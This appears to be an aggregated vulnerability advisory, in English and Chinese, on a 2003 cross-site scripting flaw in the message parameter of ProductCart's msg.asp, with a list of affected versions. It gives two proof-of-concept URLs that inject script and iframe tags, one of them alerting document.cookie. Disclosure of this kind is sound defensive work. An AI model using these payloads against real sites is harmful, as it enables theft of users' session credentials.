https://www.exploit-db.com/exploits/22866
https://www.securityfocus.com/bid/82763
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-061

ProductCart某些版本的msg.asp存在跨站脚本（XSS）漏洞。远程攻击者借助消息参数执行任意web脚本。

source: http://www.securityfocus.com/bid/8108/info

A cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values.

Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.

http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:"%
20width=400%20height=400></iframe>

Early Impact ProductCart 2Br000

Early Impact ProductCart 2

Early Impact ProductCart 1.6Br003

Early Impact ProductCart 1.6Br001

Early Impact ProductCart 1.6Br

Early Impact

来源:BUGTRAQ
名称:20030705ProductCartXSSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105761696706800&w;=2